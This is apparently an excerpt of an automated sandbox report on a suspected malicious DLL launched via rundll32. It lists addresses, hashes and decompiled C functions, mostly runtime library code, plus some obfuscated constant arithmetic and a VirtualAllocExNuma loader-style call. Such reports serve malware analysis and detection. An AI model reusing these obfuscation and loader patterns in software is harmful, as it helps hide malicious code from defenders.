0x00205749
0x0020574d
0x00205754
0x0020575b
0x0020575f
0x00205763
0x0020576a
0x00205771
0x0020577c
0x0020577f
0x00205786
0x0020578d
0x00205799
0x0020579c
0x002057a3
0x002057aa
0x002057b1
0x002057b4
0x002057bb
0x002057c2
0x002057ca
0x002057cd
0x002057d4
0x002057db
0x002057df
0x002057e6
0x002057ea
0x002057f1
0x002057f8
0x00205801
0x00205808
0x0020580f
0x00205816
0x00205822
0x00205827
0x0020582c
0x00205833
0x0020583a
0x00205841
0x00205848
0x0020584f
0x00205856
0x0020585d
0x00205867
0x0020586a
0x0020586d
0x00205874
0x0020587b
0x00205882
0x00205889
0x00205890
0x0020589b
0x002058a1
0x002058a8
0x002058af
0x002058b2
0x002058b9
0x002058c0
0x002058d3
0x002058d6
0x002058de
0x00205915
0x0020591f
0x00205951
0x00205921
0x00205923
0x0020593a
0x00205948
0x00205925
0x00205928
0x00205929
0x0020592a
0x0020592b
0x0020592b
0x0020592e
0x0020592e
0x00205959

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
Instruction ID: b72036bae2ce44238851f70da60cd17bb10973831938586f51df6b3582fb6b91
Opcode Fuzzy Hash: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
Instruction Fuzzy Hash: 5C911472500248EFDF59CF61C98A9CE3BA1FF44348F509119FE16961A0D3BAD995CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00208736, Relevance: .1, Instructions: 56
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00208736(long __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t64;
				signed int _t66;
				signed int _t67;
				signed int _t68;
				long _t77;

				_v16 = 0x5e27;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xcb06;
				_v16 = _v16 + 0xffffffa0;
				_v16 = _v16 ^ 0x0000caae;
				_v20 = 0x53d5;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x29eaafbc;
				_v12 = 0x2701;
				_t77 = __ecx;
				_t66 = 0x3f;
				_v12 = _v12 * 0x75;
				_v12 = _v12 / _t66;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x0000510c;
				_v24 = 0xb555;
				_v24 = _v24 | 0xad821aca;
				_v24 = _v24 ^ 0xad82f196;
				_v8 = 0x411b;
				_t67 = 0x67;
				_v8 = _v8 / _t67;
				_t68 = 0x1c;
				_v8 = _v8 / _t68;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x00005eaa;
				_t64 = E0021981E(_t77, E0020C506(_t68), _v16, _v12, _v24, _v8); // executed
				return _t64;
			}

0x0020873c
0x00208745
0x00208749
0x00208750
0x00208754
0x0020875b
0x00208762
0x00208766
0x0020876d
0x0020877b
0x0020877d
0x0020877e
0x00208788
0x0020878d
0x00208791
0x00208798
0x0020879f
0x002087a6
0x002087ad
0x002087b7
0x002087bc
0x002087c4
0x002087c7
0x002087ca
0x002087ce
0x002087ed
0x002087f9

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
Instruction ID: b38bfc8c66615e38a56aa153ae57a5202e229c3fd62d77ccd0c2f69146db1512
Opcode Fuzzy Hash: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
Instruction Fuzzy Hash: 17215371D00209EFEF08DFA9D94A4DEBBB2EB44304F208199E415B7294E7B51B64DF81

Uniqueness

Uniqueness Score: -1.00%

Function 10003A92, Relevance: 12.1, APIs: 8, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E10003A92(void* __edx) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t57;
				void* _t60;
				void* _t67;
				signed int _t70;
				void* _t73;
				signed int _t74;
				signed int _t78;
				void* _t80;

				_t67 = __edx;
				_push(0x10);
				_push(0x1004af08);
				E100040F0();
				_t34 =  *0x1004dc68; // 0x0
				if(_t34 > 0) {
					 *0x1004dc68 = _t34 - 1;
					 *(_t80 - 0x1c) = 1;
					 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
					 *((char*)(_t80 - 0x20)) = E100034F1();
					 *(_t80 - 4) = 1;
					__eflags =  *0x1004dc44 - 2;
					if( *0x1004dc44 != 2) {
						E10003EE0(_t67, 1, _t73, 7);
						asm("int3");
						_push(0xc);
						_push(0x1004af30);
						E100040F0();
						_t70 =  *(_t80 + 0xc);
						__eflags = _t70;
						if(_t70 != 0) {
							L9:
							 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
							__eflags = _t70 - 1;
							if(_t70 == 1) {
								L12:
								_t57 =  *(_t80 + 0x10);
								_t74 = E10003C4D( *((intOrPtr*)(_t80 + 8)), _t70, _t57);
								 *(_t80 - 0x1c) = _t74;
								__eflags = _t74;
								if(_t74 != 0) {
									_t41 = E10003938(_t60,  *((intOrPtr*)(_t80 + 8)), _t70, _t57); // executed
									_t74 = _t41;
									 *(_t80 - 0x1c) = _t74;
									__eflags = _t74;
									if(_t74 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t70 - 2;
								if(_t70 == 2) {
									goto L12;
								} else {
									_t57 =  *(_t80 + 0x10);
									L14:
									_push(_t57);
									_push(_t70);
									_push( *((intOrPtr*)(_t80 + 8)));
									_t42 = E10004518();
									_t74 = _t42;
									 *(_t80 - 0x1c) = _t74;
									__eflags = _t70 - 1;
									if(_t70 == 1) {
										__eflags = _t74;
										if(_t74 == 0) {
											_push(_t57);
											_push(_t42);
											_push( *((intOrPtr*)(_t80 + 8)));
											_t45 = E10004518();
											__eflags = _t57;
											_t25 = _t57 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E10003A92(_t67);
											_pop(_t60);
											E10003C4D( *((intOrPtr*)(_t80 + 8)), _t74, _t57);
										}
									}
									__eflags = _t70;
									if(_t70 == 0) {
										L19:
										_t74 = E10003938(_t60,  *((intOrPtr*)(_t80 + 8)), _t70, _t57);
										 *(_t80 - 0x1c) = _t74;
										__eflags = _t74;
										if(_t74 != 0) {
											_t74 = E10003C4D( *((intOrPtr*)(_t80 + 8)), _t70, _t57);
											 *(_t80 - 0x1c) = _t74;
										}
									} else {
										__eflags = _t70 - 3;
										if(_t70 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t80 - 4) = 0xfffffffe;
							_t40 = _t74;
						} else {
							__eflags =  *0x1004dc68 - _t70; // 0x0
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0x10));
						return _t40;
					} else {
						E100035BC(_t60);
						E1000452A();
						E10004591();
						 *0x1004dc44 =  *0x1004dc44 & 0x00000000;
						 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
						E10003B27();
						_t54 = E1000375D( *((intOrPtr*)(_t80 + 8)), 0);
						asm("sbb esi, esi");
						_t78 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t78;
						 *(_t80 - 0x1c) = _t78;
						 *(_t80 - 4) = 0xfffffffe;
						E10003B34();
						_t56 = _t78;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0x10));
					return _t56;
				}
			}

0x10003a92
0x10003a92
0x10003a94
0x10003a99
0x10003a9e
0x10003aa5
0x10003aac
0x10003ab4
0x10003ab7
0x10003ac0
0x10003ac3
0x10003ac6
0x10003acd
0x10003b3c
0x10003b41
0x10003b42
0x10003b44
0x10003b49
0x10003b4e
0x10003b51
0x10003b53
0x10003b64
0x10003b64
0x10003b68
0x10003b6b
0x10003b77
0x10003b77
0x10003b84
0x10003b86
0x10003b89
0x10003b8b
0x10003b96
0x10003b9b
0x10003b9d
0x10003ba0
0x10003ba2
0x00000000
0x00000000
0x10003ba2
0x10003b6d
0x10003b6d
0x10003b70
0x00000000
0x10003b72
0x10003b72
0x10003ba8
0x10003ba8
0x10003ba9
0x10003baa
0x10003bad
0x10003bb2
0x10003bb4
0x10003bb7
0x10003bba
0x10003bbc
0x10003bbe
0x10003bc0
0x10003bc1
0x10003bc2
0x10003bc5
0x10003bca
0x10003bcc
0x10003bcc
0x10003bd2
0x10003bd3
0x10003bd8
0x10003bde
0x10003bde
0x10003bbe
0x10003be3
0x10003be5
0x10003bec
0x10003bf6
0x10003bf8
0x10003bfb
0x10003bfd
0x10003c09
0x10003c31
0x10003c31
0x10003be7
0x10003be7
0x10003bea
0x00000000
0x00000000
0x10003bea
0x10003be5
0x10003b70
0x10003c34
0x10003c3b
0x10003b55
0x10003b55
0x10003b5b
0x00000000
0x10003b5d
0x10003b5d
0x10003b5d
0x10003b5b
0x10003c40
0x10003c4c
0x10003acf
0x10003acf
0x10003ad4
0x10003ad9
0x10003ade
0x10003ae5
0x10003ae9
0x10003af3
0x10003aff
0x10003b01
0x10003b01
0x10003b03
0x10003b06
0x10003b0d
0x10003b12
0x00000000
0x10003b12
0x10003aa7
0x10003aa7
0x10003b14
0x10003b17
0x10003b23
0x10003b23

APIs

__RTC_Initialize.LIBCMT ref: 10003AD9
___scrt_uninitialize_crt.LIBCMT ref: 10003AF3

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 7a051707ff0741b05a1ee3ce02520a6e0ff3268bbec48c4d0bc0eb2efb0be8cb
Instruction ID: 7bfdc372d2ca72936bd1731edce63cf54240d63550fca9bbaf8a272257527a9e
Opcode Fuzzy Hash: 7a051707ff0741b05a1ee3ce02520a6e0ff3268bbec48c4d0bc0eb2efb0be8cb
Instruction Fuzzy Hash: 8C41C272D04669ABFB22DF59CC41BAF7BACEB816D5F11C11AF804A715AC7705E01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10029C50, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10029C50(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t13;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x1004e548 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x10045368 + _t22 * 4);
						_t13 = LoadLibraryExW(_t23, 0, 0x800); // executed
						_t32 = _t13;
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E10023828(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E10023828(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x10029c59
0x10029d03
0x10029c61
0x10029c63
0x10029c6a
0x10029c6c
0x10029c72
0x10029c7f
0x10029c8e
0x10029c94
0x10029c98
0x10029cea
0x10029cea
0x10029cef
0x10029cf3
0x10029cf6
0x10029cf6
0x10029cfc
0x10029cfe
0x10029d13
0x10029d0e
0x10029d12
0x10029d12
0x10029d00
0x10029d00
0x00000000
0x10029d00
0x10029c9a
0x10029ca3
0x10029cda
0x10029cda
0x10029cdc
0x10029cde
0x00000000
0x00000000
0x10029ce6
0x00000000
0x10029ce6
0x10029cad
0x10029cb2
0x10029cb7
0x00000000
0x00000000
0x10029cc1
0x10029cc6
0x10029ccb
0x00000000
0x00000000
0x10029cd0
0x10029cd6
0x00000000
0x10029cd6
0x10029c77
0x00000000
0x00000000
0x00000000
0x10029c7d
0x10029d0c
0x00000000

Strings

api-ms-, xrefs: 10029CA7
ext-ms-, xrefs: 10029CBB

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 00ca16b444452de063b7c347b4828efdadee3ad1140b3dd23fdb962c2a8c0164
Instruction ID: 9a454b55204e61d5b080d74c5da724d9454356f1e041ce2ebe6f9b52f1a9641a
Opcode Fuzzy Hash: 00ca16b444452de063b7c347b4828efdadee3ad1140b3dd23fdb962c2a8c0164
Instruction Fuzzy Hash: 44218471A05261BBDB21CB64ED84A4E77D8EF427E1FB20121ED46E7291E770ED00D6E4

Uniqueness

Uniqueness Score: -1.00%

Function 1000D67D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000D67D(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x1004e034 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x100438d8 + _t11 * 4);
						_v8 = _t12;
						_t13 = LoadLibraryExW(_t12, 0, 0x800); // executed
						_t29 = _t13;
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E10023828(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x1000d684
0x1000d6f8
0x1000d689
0x1000d68b
0x1000d692
0x1000d696
0x1000d69f
0x1000d6ae
0x1000d6b1
0x1000d6b7
0x1000d6bb
0x1000d704
0x1000d706
0x1000d70a
0x1000d70d
0x1000d70d
0x1000d713
0x1000d713
0x1000d6ff
0x1000d703
0x1000d703
0x1000d6bd
0x1000d6c6
0x1000d6f0
0x1000d6f3
0x1000d6f5
0x1000d6f5
0x00000000
0x1000d6f5
0x1000d6c8
0x1000d6d3
0x1000d6d8
0x1000d6dd
0x00000000
0x00000000
0x1000d6e4
0x1000d6ea
0x1000d6ee
0x00000000
0x00000000
0x00000000
0x1000d6ee
0x1000d69b
0x00000000
0x00000000
0x00000000
0x1000d69d
0x1000d6fd
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,1000D73E,00000000,?,00000001,00000000,?,1000D871,00000001,FlsFree,10043994,FlsFree,00000000), ref: 1000D70D

Strings

api-ms-, xrefs: 1000D6CD

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: bda9a083905e9972f6869984c368c17e2cf1144b0b7e5e1f4797190f804308a2
Instruction ID: 65af02aee665ade10d00ef86524baa454b466fb1c62f40754c56af64b2f9aaab
Opcode Fuzzy Hash: bda9a083905e9972f6869984c368c17e2cf1144b0b7e5e1f4797190f804308a2
Instruction Fuzzy Hash: 0C119431A01666ABEB21EB689C8474D37D4DF027E0F120122EA18EB284E661ED0086E5

Uniqueness

Uniqueness Score: -1.00%

Function 10003B42, Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 10003B7F
dllmain_crt_dispatch.LIBCMT ref: 10003B96
dllmain_raw.LIBCMT ref: 10003BDE
dllmain_crt_dispatch.LIBCMT ref: 10003BF1
dllmain_raw.LIBCMT ref: 10003C04

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 81fff7e8ddae1b90393eaad18b17aae06b2df87e031cee5e04bcccc407ad455a
Instruction ID: a8148dc8121538fd3aaffcd9e8ee1bf724536045b9f1c5fcd83538124af9b725
Opcode Fuzzy Hash: 81fff7e8ddae1b90393eaad18b17aae06b2df87e031cee5e04bcccc407ad455a
Instruction Fuzzy Hash: 8F21A171D01659ABFB23DE15CC41E6F7BACEB81AD4B02C125FC05A7219C7319E018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002410D, Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00000000,7248FFF6,00000000,100244A3,1000FB64,1000E746,00000000,00000000), ref: 10024112
_free.LIBCMT ref: 1002416F
_free.LIBCMT ref: 100241A5
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF), ref: 100241B0

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 25e9bf97d666b0e2eff79ebe77c5ae729c89489cd35828147c05bc4be1c4fc18
Instruction ID: 57a6f9a0da5a3930e0307264933162919cbfd296d3a065086be207032b37c94b
Opcode Fuzzy Hash: 25e9bf97d666b0e2eff79ebe77c5ae729c89489cd35828147c05bc4be1c4fc18
Instruction Fuzzy Hash: 8611A53A3016516FE601E6757DC6F1B36A9DBD26B4FE30235F924D32E2DE219CA18114

Uniqueness

Uniqueness Score: -1.00%

Function 10001A7D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000000,?,00003000,00000040,00000000,LdrFindResource_U,?,10001EF1,LdrFindResource_U,00000000,LdrFindResource_U), ref: 10001A8F
VirtualAllocExNuma.KERNEL32 ref: 10001A96

Strings

LdrFindResource_U, xrefs: 10001A80

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AllocCurrentNumaProcessVirtual
String ID: LdrFindResource_U
API String ID: 346376999-1041023618
Opcode ID: 4c02bb6aea739f849601bb6fdcb21d7ba60705c9ec75e1d4b7f00a3d6f85dbfa
Instruction ID: d0a16a8f04b34dc33bb485e690be2f78af7230e4dc145071e4a6e5a959ba9fd3
Opcode Fuzzy Hash: 4c02bb6aea739f849601bb6fdcb21d7ba60705c9ec75e1d4b7f00a3d6f85dbfa
Instruction Fuzzy Hash: A2E04879B413247BEB215BA59C45F553F98DB097B1F004021FF0CDA291D571DD5087D8

Uniqueness

Uniqueness Score: -1.00%

Function 100316BB, Relevance: 4.7, APIs: 3, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__freea.LIBCMT ref: 10031871

Part of subcall function 10024214: RtlAllocateHeap.NTDLL(00000000,00000000,7248FFF6,?,1002B00A,1004B440,00000018,00000003), ref: 10024246

__freea.LIBCMT ref: 1003187A
__freea.LIBCMT ref: 1003189D

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: __freea$AllocateHeap
String ID:
API String ID: 2243444508-0
Opcode ID: 8d6a3bb3c0f4b8fd41e009e8b6b57536dd7696980958e54c51c196cfdfe389cd
Instruction ID: 7876994cb8969f5935bcb3e1c2cca68d888c4b8f452257783c78087195ffa41b
Opcode Fuzzy Hash: 8d6a3bb3c0f4b8fd41e009e8b6b57536dd7696980958e54c51c196cfdfe389cd
Instruction Fuzzy Hash: 8B51C276600216AFEB12CF64DC41EEB37F9EF49691F264129FD04AB150DB31EC11D6A4

Uniqueness

Uniqueness Score: -1.00%

Function 100023D8, Relevance: 4.6, APIs: 3, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000000,00000000,?,00000000,00000000,?,10002A49,00000000,10002159), ref: 10002426
VirtualAlloc.KERNELBASE(10002A49,00000000,00001000,00000004,10002159,00000000,00000000,00000000,?,00000000,00000000,?,10002A49,00000000,10002159), ref: 1000246C
und_memcpy.LIBVCRUNTIME ref: 10002486

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual$und_memcpy
String ID:
API String ID: 459566808-0
Opcode ID: 11ac3337eff717a2e9eb1217d834842c62d5a6f0c60645295981bb44394c6659
Instruction ID: 3a73c48f6b60900e827596c0a710fe36c4357a7f1bbc63153c5bd30976a621be
Opcode Fuzzy Hash: 11ac3337eff717a2e9eb1217d834842c62d5a6f0c60645295981bb44394c6659
Instruction Fuzzy Hash: 4E3178B2A00116AFEB10CF58DD85F9AB7E8EF08790F118015FA04EB245D770EC60CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000398B, Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 100039D8

Part of subcall function 1000451E: InitializeSListHead.KERNEL32(1004DF98,100039E2,1004AEE8,00000010,10003973,?,?,?,10003B9B,?,00000001,?,?,00000001,?,1004AF30), ref: 10004523

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 10003A42
___scrt_fastfail.LIBCMT ref: 10003A8C

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 2097537958-0
Opcode ID: 27b01fdb1fa95ff07f807f6bc47a04103217dde56c149050e7867ec21a409724
Instruction ID: aaaeb18818c0cc7d7fa6837dad01f7d3ce33b48f6eafd4b856e1f1e091e85652
Opcode Fuzzy Hash: 27b01fdb1fa95ff07f807f6bc47a04103217dde56c149050e7867ec21a409724
Instruction Fuzzy Hash: 2B2138397086526EFB06EB788D033DE3399DF032E5F108029E581A71D7CFB16540C61A

Uniqueness

Uniqueness Score: -1.00%

Function 10028D2F, Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 10028D38
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 10028DA6

Part of subcall function 10028BDD: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,1002B316,10032FF6,0000FDE9,00000000,?,?,?,10032D5E,0000FDE9,00000000,?), ref: 10028C89

Part of subcall function 10024214: RtlAllocateHeap.NTDLL(00000000,00000000,7248FFF6,?,1002B00A,1004B440,00000018,00000003), ref: 10024246

_free.LIBCMT ref: 10028D97

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: 13c1f5a0f658e28ba005cb8ea1a88993c2b4061e6ffaa2c2eeee22f86365a62f
